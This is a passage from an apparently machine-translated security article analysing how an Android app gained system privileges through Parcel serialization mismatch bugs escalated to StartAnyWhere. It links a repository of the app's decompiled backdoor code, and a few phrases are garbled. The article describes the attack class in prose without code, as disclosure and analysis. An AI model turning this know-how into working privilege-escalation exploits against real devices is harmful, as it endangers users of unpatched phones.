When an App has System Privileges, Can It Really Do Whatever It Wants?

Background

XXX apk embedded lifting code, and dynamic down dex analysis: https://github.com/davinci1010/pinduoduo_backdoor

About how this App obtains this system privilege, “The Most Unforgivable Vulnerability in 2022”, this article speaks very clearly, so I will not repeat.

A core object passing mechanism in Android Framework is Parcel. Objects that want to be passed by Parcel need to define readFromParcel and writeToParcel interface functions and implement the Parcelable interface. In theory, matching serialization and deserialization functions should be self-reversing and equivalent, but system ROM developers may program mismatches, such as using writeLong for writing and readInt for reading. Such problems are generally unnoticeable during operation and do not lead to crashes or errors, but can be exploited by attackers with careful But with careful planning, an attacker can eventually use the Settings and system_server processes to turn this minor error into a StartAnyWhere reference. Android has fixed hundreds of such vulnerabilities in recent years, and the Parcel mechanism has been reformed in Android 13 to completely eliminate most of these attack surfaces.

However, for Hong Meng and the vast majority of devices and users who have not…